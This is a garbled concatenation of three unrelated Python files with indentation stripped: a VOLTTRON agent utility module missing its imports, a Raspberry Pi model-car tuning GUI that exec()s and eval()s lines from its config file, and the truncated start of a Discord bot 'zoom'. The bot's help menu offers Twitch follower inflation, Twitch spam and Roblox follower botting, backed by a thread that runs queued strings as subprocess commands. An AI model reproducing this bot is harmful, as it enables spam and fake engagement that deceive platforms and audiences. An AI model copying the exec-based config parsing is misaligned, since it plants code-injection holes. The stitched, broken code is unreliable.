from volttron.platform import get_home, get_address
from dateutil.parser import parse
from dateutil.tz import tzutc, tzoffset
from tzlocal import get_localzone
from volttron.platform.agent import json as jsonapi
try:
from ..lib.inotify.green import inotify, IN_MODIFY
except AttributeError:
# inotify library is not available on OS X/MacOS.
# @TODO Integrate with the OS X FS Events API
inotify = None
IN_MODIFY = None
__all__ = ['load_config', 'run_agent', 'start_agent_thread',
'is_valid_identity']
__author__ = 'Brandon Carpenter <brandon.carpenter@pnnl.gov>'
__copyright__ = 'Copyright (c) 2016, Battelle Memorial Institute'
__license__ = 'FreeBSD'
_comment_re = re.compile(
r'((["\'])(?:\\?.)*?\2)|(/\*.*?\*/)|((?:#|//).*?(?=\n|$))',
re.MULTILINE | re.DOTALL)
_log = logging.getLogger(__name__)
# The following are the only allowable characters for identities.
_VALID_IDENTITY_RE = re.compile(r"^[A-Za-z0-9_.\-]+$")
def is_valid_identity(identity_to_check):
""" Checks the passed identity to see if it contains invalid characters
A None value for identity_to_check will return False
@:param: string: The vip_identity to check for validity
    @:return: boolean: True if all characters are in the set of valid characters.
"""
if identity_to_check is None:
return False
return _VALID_IDENTITY_RE.match(identity_to_check)
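# For example (illustrative values): is_valid_identity('platform.historian') returns a truthy
# match object, while is_valid_identity('bad identity!') and is_valid_identity(None) are falsy.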
def normalize_identity(pre_identity):
if is_valid_identity(pre_identity):
return pre_identity
if pre_identity is None:
raise ValueError("Identity cannot be none.")
norm = ""
for s in pre_identity:
if _VALID_IDENTITY_RE.match(s):
norm += s
else:
norm += '_'
return norm
def _repl(match):
"""Replace the matched group with an appropriate string."""
# If the first group matched, a quoted string was matched and should
# be returned unchanged. Otherwise a comment was matched and the
# empty string should be returned.
return match.group(1) or ''
def strip_comments(string):
"""Return string with all comments stripped.
Both JavaScript-style comments (//... and /*...*/) and hash (#...)
comments are removed.
"""
return _comment_re.sub(_repl, string)
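# For example (illustrative input): strip_comments('{"url": "http://x"} // note') returns
# '{"url": "http://x"} ' -- the quoted string is preserved while //, /* */ and # comments
# are removed.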
def load_config(config_path):
"""Load a JSON-encoded configuration file."""
if config_path is None:
_log.info("AGENT_CONFIG does not exist in environment. load_config returning empty configuration.")
return {}
if not os.path.exists(config_path):
_log.info("Config file specified by AGENT_CONFIG does not exist. load_config returning empty configuration.")
return {}
# First attempt parsing the file with a yaml parser (allows comments natively)
# Then if that fails we fallback to our modified json parser.
try:
with open(config_path) as f:
return yaml.safe_load(f.read())
except yaml.scanner.ScannerError as e:
try:
with open(config_path) as f:
return parse_json_config(f.read())
        except Exception as e:  # StandardError does not exist on Python 3
_log.error("Problem parsing agent configuration")
raise
def update_kwargs_with_config(kwargs, config):
"""
Loads the user defined configurations into kwargs.
1. Converts any dash/hyphen in config variables into underscores
2. Checks for configured "identity" value. Prints a deprecation
warning and uses it.
3. Checks for configured "agentid" value. Prints a deprecation warning
and ignores it
:param kwargs: kwargs to be updated
:param config: dictionary of user/agent configuration
"""
if config.get('identity') is not None:
_log.warning("DEPRECATION WARNING: Setting a historian's VIP IDENTITY"
" from its configuration file will no longer be supported"
" after VOLTTRON 4.0")
_log.warning(
"DEPRECATION WARNING: Using the identity configuration setting "
"will override the value provided by the platform. This new value "
"will not be reported correctly by 'volttron-ctl status'")
_log.warning("DEPRECATION WARNING: Please remove 'identity' from your "
"configuration file and use the new method provided by "
"the platform to set an agent's identity. See "
"scripts/core/make-mongo-historian.sh for an example of "
"how this is done.")
if config.get('agentid') is not None:
_log.warning("WARNING: Agent id cannot be configured. It is a unique "
"id assigned by VOLTTRON platform. Ignoring configured "
"agentid")
config.pop('agentid')
for k, v in config.items():
kwargs[k.replace("-","_")] = v
def parse_json_config(config_str):
"""Parse a JSON-encoded configuration file."""
return jsonapi.loads(strip_comments(config_str))
def run_agent(cls, subscribe_address=None, publish_address=None,
config_path=None, **kwargs):
"""Instantiate an agent and run it in the current thread.
Attempts to get keyword parameters from the environment if they
are not set.
"""
if not subscribe_address:
subscribe_address = os.environ.get('AGENT_SUB_ADDR')
if subscribe_address:
kwargs['subscribe_address'] = subscribe_address
if not publish_address:
publish_address = os.environ.get('AGENT_PUB_ADDR')
if publish_address:
kwargs['publish_address'] = publish_address
if not config_path:
config_path = os.environ.get('AGENT_CONFIG')
if config_path:
kwargs['config_path'] = config_path
agent = cls(**kwargs)
agent.run()
def start_agent_thread(cls, **kwargs):
"""Instantiate an agent class and run it in a new daemon thread.
Returns the thread object.
"""
import threading
agent = cls(**kwargs)
thread = threading.Thread(target=agent.run)
thread.daemon = True
thread.start()
return thread
def isapipe(fd):
fd = getattr(fd, 'fileno', lambda: fd)()
return stat.S_ISFIFO(os.fstat(fd).st_mode)
def default_main(agent_class, description=None, argv=sys.argv,
parser_class=argparse.ArgumentParser, **kwargs):
"""Default main entry point implementation for legacy agents.
    description and parser_class are deprecated. Please avoid using them.
"""
try:
# If stdout is a pipe, re-open it line buffered
if isapipe(sys.stdout):
# Hold a reference to the previous file object so it doesn't
# get garbage collected and close the underlying descriptor.
stdout = sys.stdout
sys.stdout = os.fdopen(stdout.fileno(), 'w', 1)
try:
sub_addr = os.environ['AGENT_SUB_ADDR']
pub_addr = os.environ['AGENT_PUB_ADDR']
except KeyError as exc:
sys.stderr.write(
'missing environment variable: {}\n'.format(exc.args[0]))
sys.exit(1)
if sub_addr.startswith('ipc://') and sub_addr[6:7] != '@':
if not os.path.exists(sub_addr[6:]):
sys.stderr.write('warning: subscription socket does not '
'exist: {}\n'.format(sub_addr[6:]))
if pub_addr.startswith('ipc://') and pub_addr[6:7] != '@':
if not os.path.exists(pub_addr[6:]):
sys.stderr.write('warning: publish socket does not '
'exist: {}\n'.format(pub_addr[6:]))
config = os.environ.get('AGENT_CONFIG')
agent = agent_class(subscribe_address=sub_addr,
publish_address=pub_addr,
config_path=config, **kwargs)
agent.run()
except KeyboardInterrupt:
pass
def vip_main(agent_class, identity=None, version='0.1', **kwargs):
"""Default main entry point implementation for VIP agents."""
try:
# If stdout is a pipe, re-open it line buffered
if isapipe(sys.stdout):
# Hold a reference to the previous file object so it doesn't
# get garbage collected and close the underlying descriptor.
stdout = sys.stdout
sys.stdout = os.fdopen(stdout.fileno(), 'w', 1)
# Quiet printing of KeyboardInterrupt by greenlets
Hub = gevent.hub.Hub
Hub.NOT_ERROR = Hub.NOT_ERROR + (KeyboardInterrupt,)
config = os.environ.get('AGENT_CONFIG')
identity = os.environ.get('AGENT_VIP_IDENTITY', identity)
if identity is not None:
if not is_valid_identity(identity):
                _log.warn('Deprecation warning')
                _log.warn(
                    'All characters in {identity} are not in the valid set.'
                    .format(identity=identity))
address = get_address()
agent_uuid = os.environ.get('AGENT_UUID')
volttron_home = get_home()
agent = agent_class(config_path=config, identity=identity,
address=address, agent_uuid=agent_uuid,
volttron_home=volttron_home,
version=version, **kwargs)
try:
run = agent.run
except AttributeError:
run = agent.core.run
task = gevent.spawn(run)
try:
task.join()
finally:
task.kill()
except KeyboardInterrupt:
pass
class SyslogFormatter(logging.Formatter):
_level_map = {logging.DEBUG: syslog.LOG_DEBUG,
logging.INFO: syslog.LOG_INFO,
logging.WARNING: syslog.LOG_WARNING,
logging.ERROR: syslog.LOG_ERR,
logging.CRITICAL: syslog.LOG_CRIT}
def format(self, record):
level = self._level_map.get(record.levelno, syslog.LOG_INFO)
return '<{}>'.format(level) + super(SyslogFormatter, self).format(
record)
class JsonFormatter(logging.Formatter):
def format(self, record):
dct = record.__dict__.copy()
dct["msg"] = record.getMessage()
dct.pop('args')
exc_info = dct.pop('exc_info', None)
if exc_info:
dct['exc_text'] = ''.join(traceback.format_exception(*exc_info))
return jsonapi.dumps(dct)
class AgentFormatter(logging.Formatter):
def __init__(self, fmt=None, datefmt=None):
if fmt is None:
fmt = '%(asctime)s %(composite_name)s %(levelname)s: %(message)s'
super(AgentFormatter, self).__init__(fmt=fmt, datefmt=datefmt)
def composite_name(self, record):
if record.name == 'agents.log':
cname = '(%(processName)s %(process)d) %(remote_name)s'
elif record.name.startswith('agents.std'):
cname = '(%(processName)s %(process)d) <{}>'.format(
record.name.split('.', 2)[1])
else:
cname = '() %(name)s'
return cname % record.__dict__
def format(self, record):
if 'composite_name' not in record.__dict__:
record.__dict__['composite_name'] = self.composite_name(record)
if len(record.args) > 0 \
and 'tornado.access' in record.__dict__['composite_name']:
record.__dict__['msg'] = ','.join([str(b) for b in record.args])
record.__dict__['args'] = []
return super(AgentFormatter, self).format(record)
def setup_logging(level=logging.DEBUG):
root = logging.getLogger()
if not root.handlers:
handler = logging.StreamHandler()
if isapipe(sys.stderr) and '_LAUNCHED_BY_PLATFORM' in os.environ:
handler.setFormatter(JsonFormatter())
else:
fmt = '%(asctime)s %(name)s %(levelname)s: %(message)s'
handler.setFormatter(logging.Formatter(fmt))
root.addHandler(handler)
root.setLevel(level)
def format_timestamp(time_stamp):
"""Create a consistent datetime string representation based on
ISO 8601 format.
YYYY-MM-DDTHH:MM:SS.mmmmmm for unaware datetime objects.
YYYY-MM-DDTHH:MM:SS.mmmmmm+HH:MM for aware datetime objects
:param time_stamp: value to convert
:type time_stamp: datetime
:returns: datetime in string format
:rtype: str
"""
time_str = time_stamp.strftime("%Y-%m-%dT%H:%M:%S.%f")
if time_stamp.tzinfo is not None:
sign = '+'
td = time_stamp.tzinfo.utcoffset(time_stamp)
if td.days < 0:
sign = '-'
td = -td
seconds = td.seconds
minutes, seconds = divmod(seconds, 60)
hours, minutes = divmod(minutes, 60)
time_str += "{sign}{HH:02}:{MM:02}".format(sign=sign,
HH=hours,
MM=minutes)
return time_str
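# For example (illustrative values):
#   format_timestamp(datetime(2017, 1, 2, 3, 4, 5, 600000))
#   -> '2017-01-02T03:04:05.600000'
#   format_timestamp(datetime(2017, 1, 2, 3, 4, 5, 600000, tzinfo=pytz.UTC))
#   -> '2017-01-02T03:04:05.600000+00:00'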
def parse_timestamp_string(time_stamp_str):
"""
Create a datetime object from the supplied date/time string.
Uses dateutil.parse with no extra parameters.
For performance reasons we try
YYYY-MM-DDTHH:MM:SS.mmmmmm
or
YYYY-MM-DDTHH:MM:SS.mmmmmm+HH:MM
based on the string length before falling back to dateutil.parse.
    @param time_stamp_str: string to convert
    @return: datetime object
"""
if len(time_stamp_str) == 26:
try:
return datetime.strptime(time_stamp_str, "%Y-%m-%dT%H:%M:%S.%f")
except ValueError:
pass
elif len(time_stamp_str) == 32:
try:
base_time_stamp_str = time_stamp_str[:26]
time_zone_str = time_stamp_str[26:]
time_stamp = datetime.strptime(base_time_stamp_str, "%Y-%m-%dT%H:%M:%S.%f")
# Handle most common case.
if time_zone_str == "+00:00":
return time_stamp.replace(tzinfo=pytz.UTC)
hours_offset = int(time_zone_str[1:3])
minutes_offset = int(time_zone_str[4:6])
seconds_offset = hours_offset * 3600 + minutes_offset * 60
if time_zone_str[0] == "-":
seconds_offset = -seconds_offset
return time_stamp.replace(tzinfo=tzoffset("", seconds_offset))
except ValueError:
pass
return parse(time_stamp_str)
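# For example (illustrative values):
#   parse_timestamp_string('2017-01-02T03:04:05.600000')        # naive datetime via strptime
#   parse_timestamp_string('2017-01-02T03:04:05.600000+00:00')  # aware datetime in pytz.UTC
#   parse_timestamp_string('Jan 2 2017 3:04am')                 # falls back to dateutil.parse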
def get_aware_utc_now():
"""Create a timezone aware UTC datetime object from the system time.
:returns: an aware UTC datetime object
:rtype: datetime
"""
utcnow = datetime.utcnow()
utcnow = pytz.UTC.localize(utcnow)
return utcnow
def get_utc_seconds_from_epoch(timestamp=None):
"""
    convert a given time stamp to seconds from epoch based on utc time. If
    the given time is a naive datetime it is considered to be local to where
    this code is running.
@param timestamp: datetime object
@return: seconds from epoch
"""
if timestamp is None:
timestamp = datetime.now(tz=tzutc())
if timestamp.tzinfo is None:
local_tz = get_localzone()
# Do not use datetime.replace(tzinfo=local_tz) instead use localize()
timestamp = local_tz.localize(timestamp)
# utctimetuple can be called on aware timestamps and it will
# convert to UTC first.
seconds_from_epoch = calendar.timegm(timestamp.utctimetuple())
# timetuple loses microsecond accuracy so we have to put it back.
seconds_from_epoch += timestamp.microsecond / 1000000.0
return seconds_from_epoch
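# For example (illustrative value): get_utc_seconds_from_epoch(datetime(1970, 1, 1, tzinfo=tzutc()))
# returns 0.0; naive datetimes are first localized to the machine's local timezone.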
def process_timestamp(timestamp_string, topic=''):
"""
    Convert a timestamp string to a timezone-aware UTC timestamp
@param timestamp_string: datetime string to parse
@param topic: topic to which parse errors are published
@return: UTC datetime object and the original timezone of input datetime
"""
if timestamp_string is None:
_log.error("message for {topic} missing timetamp".format(topic=topic))
return
try:
timestamp = parse_timestamp_string(timestamp_string)
except (ValueError, TypeError):
_log.error("message for {topic} bad timetamp string: {ts_string}"
.format(topic=topic, ts_string=timestamp_string))
return
if timestamp.tzinfo is None:
timestamp = timestamp.replace(tzinfo=pytz.UTC)
original_tz = None
else:
original_tz = timestamp.tzinfo
timestamp = timestamp.astimezone(pytz.UTC)
return timestamp, original_tz
def watch_file(fullpath, callback):
"""Run callback method whenever the file changes
Not available on OS X/MacOS.
"""
dirname, filename = os.path.split(fullpath)
if inotify is None:
_log.warning("Runtime changes to: %s not supported on this platform.", fullpath)
else:
with inotify() as inot:
inot.add_watch(dirname, IN_MODIFY)
for event in inot:
if event.name == filename and event.mask & IN_MODIFY:
callback()
def watch_file_with_fullpath(fullpath, callback):
"""Run callback method whenever the file changes
Not available on OS X/MacOS.
"""
dirname, filename = os.path.split(fullpath)
if inotify is None:
_log.warning("Runtime changes to: %s not supported on this platform.", fullpath)
else:
with inotify() as inot:
inot.add_watch(dirname, IN_MODIFY)
for event in inot:
if event.name == filename and event.mask & IN_MODIFY:
callback(fullpath)
def create_file_if_missing(path, permission=0o660, contents=None):
dirname = os.path.dirname(path)
if dirname and not os.path.exists(dirname):
try:
os.makedirs(dirname)
except OSError as e:
if e.errno != errno.EEXIST:
raise
try:
open(path)
except IOError as exc:
if exc.errno != errno.ENOENT:
raise
_log.debug('missing file %s', path)
_log.info('creating file %s', path)
fd = os.open(path, os.O_CREAT | os.O_WRONLY, permission)
try:
if contents:
os.write(fd, contents)
finally:
os.close(fd)
def fix_sqlite3_datetime(sql=None):
"""Primarily for fixing the base historian cache on certain versions
of python.
    Registers a new datetime converter that uses dateutil parse. This should
    better resolve #216, #174, and #91 without the goofy workarounds that
    change data.
Optional sql argument is for testing only.
"""
if sql is None:
import sqlite3 as sql
sql.register_adapter(datetime, format_timestamp)
sql.register_converter("timestamp", parse_timestamp_string)
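# A usage sketch (an assumption, mirroring the adapter/converter pair registered above):
#
#     fix_sqlite3_datetime()
#     conn = sqlite3.connect(':memory:', detect_types=sqlite3.PARSE_DECLTYPES)
#     # columns declared as "timestamp" now round-trip through format_timestamp /
#     # parse_timestamp_string instead of sqlite3's default converters.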
|
tatamiracer_test.py
|
# TatamiRacer Test for Steering Servo and Motor
import pigpio
import tkinter as tk
from tkinter import messagebox
import numpy as np
import os
import re
import time
import threading
pi = pigpio.pi()
gpio_pin0 = 13 #Motor1
gpio_pin1 = 19 #Motor2
gpio_pin2 = 14 #Servo
fname = os.getcwd()+r'/myconfig.py' #for Donkey Car parameter file
#Variable
class cfg: #parameter
pass
root = tk.Tk()
motor = tk.IntVar()
servo = tk.IntVar()
servo_center = tk.IntVar()
servo_limit = tk.IntVar()
servo_limit_flag = tk.BooleanVar()
throttle_boost_enable_flag = tk.BooleanVar()
throttle = tk.DoubleVar()
steering = tk.DoubleVar()
throttle_start_boost = tk.DoubleVar()
throttle_start_boost_time = tk.DoubleVar()
throttle_upper_limit = tk.DoubleVar()
throttle_lower_limit = tk.DoubleVar()
throttle_steering_boost = tk.DoubleVar()
steering_feel = tk.DoubleVar()
steering_balance = tk.DoubleVar()
throttle_start_boost_time0 = 0.0
throttle_start_boost_val = 0.0
throttle_deadzone=0.01
timer_enable = True
def timer100ms():
global throttle_start_boost_val,throttle_start_boost_time0
if not timer_enable:
return
throttle_abs = np.abs(throttle.get())
t_current = time.time()
if throttle_abs<=throttle_deadzone:
throttle_start_boost_time0 = t_current
#Throttle Boost
t = t_current-throttle_start_boost_time0
if(t <= throttle_start_boost_time.get()):
throttle_start_boost_val = throttle_start_boost.get() #Boost mode
else:
throttle_start_boost_val = 0.0
set_throttle(0)
t = threading.Timer(0.1, timer100ms)
t.start()
def set_timer():
t = threading.Thread(target=timer100ms)
t.start()
return t
def set_config():
servo_max= cfg.TATAMI_STEERING_LEFT_PWM
servo_min= cfg.TATAMI_STEERING_RIGHT_PWM
tmp=int(servo_max-servo_min)/2
servo_limit.set(tmp)
servo_limit_flag.set(True)
throttle_boost_enable_flag.set(True)
servo_center.set(servo_min+tmp)
servo.set(servo_center.get())
motor.set(0)
throttle.set(0)
steering.set(0)
set_motor(0)
set_servo(0)
steering_feel.set(cfg.TATAMI_STEERING_FEEL)
steering_balance.set(cfg.TATAMI_STEERING_BALANCE)
throttle_start_boost_time.set(cfg.TATAMI_THROTTLE_START_BOOST_TIME)
throttle_start_boost.set(cfg.TATAMI_THROTTLE_START_BOOST)
throttle_upper_limit.set(cfg.TATAMI_THROTTLE_UPPER_LIMIT)
throttle_lower_limit.set(cfg.TATAMI_THROTTLE_LOWER_LIMIT)
throttle_steering_boost.set(cfg.TATAMI_THROTTLE_STEERING_BOOST)
status()
status2()
disable_button()
def load_config():
f=open(fname)
datalist=f.readlines()
f.close()
i=0
for s in datalist:
tmp = re.match(r'^(TATAMI_[A-z_0-9]+\s*[=].+)#',s)
if tmp:
exec('cfg.'+tmp.groups()[0])
i=i+1
set_config()
def save_config():
ret = messagebox.askyesno('Write configuration','Write myconfig.py?')
if not ret:return
f = open(fname)
datalist=f.readlines()
f.close()
servo_max = servo_center.get()+servo_limit.get()
servo_min = servo_center.get()-servo_limit.get()
cfg.TATAMI_STEERING_LEFT_PWM = servo_max
cfg.TATAMI_STEERING_RIGHT_PWM = servo_min
cfg.TATAMI_STEERING_FEEL=steering_feel.get()
cfg.TATAMI_STEERING_BALANCE=steering_balance.get()
cfg.TATAMI_THROTTLE_START_BOOST_TIME=throttle_start_boost_time.get()
cfg.TATAMI_THROTTLE_START_BOOST=throttle_start_boost.get()
cfg.TATAMI_THROTTLE_UPPER_LIMIT=throttle_upper_limit.get()
cfg.TATAMI_THROTTLE_LOWER_LIMIT=throttle_lower_limit.get()
cfg.TATAMI_THROTTLE_STEERING_BOOST=throttle_steering_boost.get()
print('Write Parameter into:' + fname)
i = 0
for s in datalist:
tmp = re.match(r'^(TATAMI_[A-z_0-9]+)\s*[=].+(#.+$)',s)
if tmp:
varname =tmp.groups()[0]
val = str( eval('cfg.'+varname) )
comment = tmp.groups()[1]
d = varname+" = "+val+" "+comment
datalist[i] = d+"\n"
print(d)
i = i + 1
f=open(fname,'w')
f.writelines(datalist)
f.close()
def init_config():
load_config()
set_config()
def set_motor(motor_level):
motor_v=int(motor_level)
if motor_v > 0:
pi.set_PWM_range(gpio_pin0, 100) # Set PWM range
pi.set_PWM_dutycycle(gpio_pin0, motor_v) # Set PWM duty
pi.set_PWM_frequency(gpio_pin0,490)
pi.set_PWM_dutycycle(gpio_pin1, 0) # PWM off
else:
pi.set_PWM_range(gpio_pin1, 100) # Set PWM range
pi.set_PWM_dutycycle(gpio_pin1, -motor_v) # Set PWM duty
pi.set_PWM_frequency(gpio_pin1,490)
pi.set_PWM_dutycycle(gpio_pin0, 0) # PWM off
def set_servo(x):
servo_v = servo.get()
servo_max = servo_center.get()+servo_limit.get()
servo_min = servo_center.get()-servo_limit.get()
if servo_limit_flag.get() and servo_v > servo_max:
servo_v = servo_max
elif servo_limit_flag.get() and servo_v < servo_min:
servo_v = servo_min
pi.set_mode(gpio_pin2, pigpio.OUTPUT)
pi.set_servo_pulsewidth(gpio_pin2, servo_v )
servo.set(servo_v)
status()
def set_throttle(x):
global throttle_start_boost_val
th_in = throttle.get()
throttle_abs = np.abs(th_in)
#Steering Boost
angle_adjust = throttle_lower_limit.get()+np.abs(steering.get())*(throttle_steering_boost.get()-throttle_lower_limit.get())
#Feeling
if throttle_abs < throttle_lower_limit.get():
throttle_feel = throttle_lower_limit.get()
elif throttle_abs > throttle_upper_limit.get():
throttle_feel = throttle_upper_limit.get()
else:
slope = throttle_upper_limit.get()-throttle_lower_limit.get()
throttle_feel = throttle_lower_limit.get() + throttle_abs*slope
if throttle_abs > throttle_deadzone:
if throttle_boost_enable_flag.get():
th = np.sign(th_in)*max(throttle_start_boost_val,angle_adjust,throttle_feel)
else:
th = th_in
else:
th=0
s1.set(th*100)
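# Worked example of the set_throttle boost logic above (made-up parameter values): with
# throttle_lower_limit=0.2, throttle_upper_limit=0.5, throttle_start_boost=0.4, steering=0
# and a stick input of 0.3 inside the start-boost window,
# throttle_feel = 0.2 + 0.3*(0.5-0.2) = 0.29 and angle_adjust = 0.2, so
# th = max(0.4, 0.2, 0.29) = 0.4 and the motor PWM slider is set to 40.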
def set_steering(x):
angle = steering.get()
#Steering Feeling Adjustment
ang_abs=np.abs(angle)
steering_half=0.5
if ang_abs < steering_half:
slope = steering_feel.get()/steering_half
angle = np.sign(angle)*ang_abs*slope
else:
slope = (1.0-steering_feel.get())/(1.0-steering_half)
angle = np.sign(angle)* (steering_feel.get()+(ang_abs-steering_half)*slope)
#Steering Balance Adjustment
if angle>0:
angle = angle * (1.0+steering_balance.get())
else:
angle = angle * (1.0-steering_balance.get())
v = servo_center.get()-servo_limit.get()*angle
s2.set(v)
set_throttle(0)
def status():
servo_offset = servo.get()-servo_center.get()
servo_max = servo_center.get()+servo_limit.get()
servo_min = servo_center.get()-servo_limit.get()
s = ' Servo:'+str(servo_offset)
s = s+' Limit:'+str(servo_limit.get())
s = s+' (Min:'+str(servo_min)
s = s+ ' Center:'+str(servo_center.get())
s = s+' Max:'+str(servo_max)+')'
l1.config(text=s)
def status2():
s = 'Start Boost:'+str(throttle_start_boost.get())
s = s + ' Steering Boost:'+str(throttle_steering_boost.get())
s = s + ' Lower Limit:'+str(throttle_lower_limit.get())
s = s + ' Upper Limit:'+str(throttle_upper_limit.get())
l2.config(text=s)
def disable_button():
if servo_limit_flag.get():
b3.config(state=tk.DISABLED)
b4.config(state=tk.DISABLED)
else:
b3.config(state=tk.NORMAL)
b4.config(state=tk.NORMAL)
if throttle_boost_enable_flag.get():
b12.config(state=tk.DISABLED)
b11.config(state=tk.DISABLED)
b9.config(state=tk.DISABLED)
b8.config(state=tk.DISABLED)
else:
b12.config(state=tk.NORMAL)
b11.config(state=tk.NORMAL)
b9.config(state=tk.NORMAL)
b8.config(state=tk.NORMAL)
#GUI
root.title('TatamiRacer Test')
root.minsize(width=640, height=480)
#Make GUI
f1=tk.Frame(root)
f1.pack(fill = tk.BOTH)
f3=tk.Frame(root)
f3.pack(fill = tk.BOTH)
f4=tk.Frame(root)
f4.pack(fill = tk.BOTH)
f7=tk.Frame(root)
f7.pack(fill = tk.BOTH)
f6=tk.Frame(root)
f6.pack(fill = tk.BOTH)
f5=tk.Frame(root)
f5.pack(fill = tk.BOTH)
f2=tk.Frame(root)
f2.pack(fill = tk.BOTH)
s1 = tk.Scale(f1, label = 'Motor PWM: ', orient = 'h', from_ = -100.0,
to = 100.0, variable = motor, command = set_motor)
s1.pack(fill = tk.BOTH)
b1 = tk.Button(f1, text= 'Off', command = lambda :s1.set(0) )
b1.pack()
s2 = tk.Scale(f1, label = 'Servo PWM: ', orient = 'h',
from_ = 500.0, to = 2500.0, variable = servo, command =set_servo)
s2.pack(fill=tk.BOTH)
l1 = tk.Label(f3, width=100, text='')
l1.pack(fill=tk.BOTH)
b2 = tk.Button(f1, text= 'Center', command = lambda :[s2.set(servo_center.get()),status()])
b2.pack()
c1 = tk.Checkbutton(f1, text= 'Enable Servo Limit' ,variable = servo_limit_flag,
command = lambda :[s2.set(servo_center.get()),disable_button()] )
c1.pack(side=tk.RIGHT)
b4 = tk.Button(f1, text= 'Set Servo Limit',
command = lambda :[servo_limit.set( np.abs(servo.get()-servo_center.get() )),status()])
b4.pack(side=tk.RIGHT)
b3 = tk.Button(f1, text= 'Set Servo Center',
command = lambda:[servo_center.set(servo.get()),status()])
b3.pack(side=tk.RIGHT)
s3 = tk.Scale(f4, label = 'Throttle Level: ', orient = 'h',
from_ = -1.0, to = 1.0, resolution=0.01, variable = throttle, command= set_throttle)
s3.pack(fill=tk.BOTH)
b10 = tk.Button(f7, text= 'Forward >', command = lambda:s3.set(0.1) )
b10.pack(side=tk.RIGHT,ipadx=120)
b15 = tk.Button(f7, text= 'Stop', command = lambda:s3.set(0) )
b15.pack(side=tk.RIGHT,ipadx=120)
b16 = tk.Button(f7, text= '< Backward', command = lambda:s3.set(-0.1) )
b16.pack(side=tk.RIGHT,ipadx=120)
c2 = tk.Checkbutton(f4, text= 'Enable Boost&Limit' ,variable = throttle_boost_enable_flag,
command = lambda :[disable_button(),s3.set(0)] )
c2.pack(side=tk.RIGHT)
b12 = tk.Button(f4, text= 'Set Upper Limit',
command = lambda: [throttle_upper_limit.set(s3.get()),status2()] )
b12.pack(side=tk.RIGHT)
b11 = tk.Button(f4, text= 'Set Lower Limit',
command = lambda: [throttle_lower_limit.set(s3.get()),status2()] )
b11.pack(side=tk.RIGHT)
b9 = tk.Button(f4, text= 'Set Steering Boost',
command = lambda:[throttle_steering_boost.set(s3.get()),status2()] )
b9.pack(side=tk.RIGHT)
b8 = tk.Button(f4, text= 'Set Start Boost',
command = lambda:[throttle_start_boost.set(s3.get()),status2()] )
b8.pack(side=tk.RIGHT)
s4 = tk.Scale(f5, label = 'Steering Level: ', orient = 'h',
from_ = -1.0, to = 1.0, resolution=0.01, variable = steering, command = set_steering)
s4.pack(fill=tk.BOTH)
b13 = tk.Button(f5, text= 'Center', command = lambda:s4.set(0) )
b13.pack()
s5 = tk.Scale(f5, label = 'Steering Feel:', orient = 'h',length=320,
from_ = 0.1, to = 0.9, resolution=0.01, variable = steering_feel )
s5.pack(side=tk.RIGHT)
s6 = tk.Scale(f5, label = 'Steering Balance:', orient = 'h',length=320,
from_ = -0.9, to = 0.9, resolution=0.01, variable = steering_balance )
s6.pack(side=tk.RIGHT)
s7 = tk.Scale(f5, label = 'Start Boost Time:', orient = 'h',length=320,
from_ = 0.0, to = 3.0, resolution=0.1, variable = throttle_start_boost_time )
s7.pack(side=tk.RIGHT)
l2 = tk.Label(f6, width=100, text='-')
l2.pack(fill=tk.BOTH)
b14 = tk.Button(f2, text= 'Close', command = lambda :root.destroy() )
b14.pack(side=tk.RIGHT)
b5 = tk.Button(f2, text= 'Write myconfig.py', command = save_config )
b5.pack(side=tk.RIGHT)
b7 = tk.Button(f2, text= 'Load myconfig.py',
command = lambda :[load_config(),s2.set(servo_center.get()),status(),status2()] )
b7.pack(side=tk.RIGHT)
#Start
init_config()
status()
disable_button()
timer_thread=set_timer()
root.mainloop()
#Exit
timer_enable = False
pi.set_mode(gpio_pin0, pigpio.INPUT)
pi.set_mode(gpio_pin1, pigpio.INPUT)
pi.set_mode(gpio_pin2, pigpio.INPUT)
pi.stop()
time.sleep(1)
print('TatamiRacer Test End')
|
bot.py
|
from discord.ext import commands
import subprocess
import threading
import aiofiles
import discord
import asyncio
import aiohttp
import random
import ctypes
import re
import os
ctypes.windll.kernel32.SetConsoleTitleW('zoom')
token = ''
prefix = '/'
intents = discord.Intents().all()
bot = commands.Bot(command_prefix=prefix, case_insensitive=True, intents=intents)
bot.remove_command('help')
administrators = []
chat_channel = ''
bots_channel = ''
queue = []
def zoom():
while True:
try:
task, arg1, arg2 = queue.pop(0).split('-')
subprocess.run([f'{task}', f'{arg1}', f'{arg2}'])
except:
pass
threading.Thread(target=zoom).start()
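# Queue item format assumed by zoom(): 'task-arg1-arg2', e.g. 'tfollow-somechannel-100'
# or 'tspam-somechannel-hello', split on '-' and executed as
# subprocess.run(['tfollow', 'somechannel', '100']). The 'tfollow'/'tspam' executables
# are external to this file, and items containing extra '-' characters fail the unpack
# (hence the '-' check in the /tfollow command below).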
@bot.event
async def on_ready():
print(f'Servers: {len(bot.guilds)}')
for guild in bot.guilds:
print(guild.name)
print()
while True:
members = sum([guild.member_count for guild in bot.guilds])
activity = discord.Activity(type=discord.ActivityType.watching, name=f'{members} users!')
await bot.change_presence(activity=activity)
await asyncio.sleep(60)
@bot.event
async def on_member_join(member):
channel = await bot.fetch_channel(bots_channel)
await channel.send(f'Welcome to **zoom**, {member.mention}.\nType `/help` to get started!')
@bot.event
async def on_command_error(ctx, error: Exception):
if ctx.channel.id == bots_channel:
if isinstance(error, commands.CommandOnCooldown):
embed = discord.Embed(color=16379747, description=f'{error}')
await ctx.send(embed=embed)
elif isinstance(error, commands.MissingRequiredArgument):
embed = discord.Embed(color=16379747, description='You are missing arguments required to run this command!')
await ctx.send(embed=embed)
ctx.command.reset_cooldown(ctx)
elif 'You do not own this bot.' in str(error):
embed = discord.Embed(color=16379747, description='You do not have permission to run this command!')
await ctx.send(embed=embed)
else:
print(str(error))
else:
try:
await ctx.message.delete()
except:
pass
@bot.command()
async def help(ctx):
print(f'{ctx.author} | {ctx.author.id} -> /help')
if ctx.channel.type != discord.ChannelType.private:
embed = discord.Embed(color=16379747)
embed.add_field(name='Help', value='`/help`', inline=True)
embed.add_field(name='Open Ticket', value='`/ticket`', inline=True)
embed.add_field(name='Close Ticket', value='`/close`', inline=True)
embed.add_field(name='Tasks', value='`/tasks`', inline=True)
embed.add_field(name='Twitch Followers', value='`/tfollow (channel)`', inline=True)
embed.add_field(name='⭐ Twitch Spam', value='`/tspam (channel) (message)`', inline=True)
embed.add_field(name='Roblox Followers', value='`/rfollow (user id)`', inline=True)
embed.add_field(name='Roblox Templates', value='`/rget (asset id)`', inline=True)
await ctx.send(embed=embed)
@bot.command()
async def ticket(ctx):
print(f'{ctx.author} | {ctx.author.id} -> /ticket')
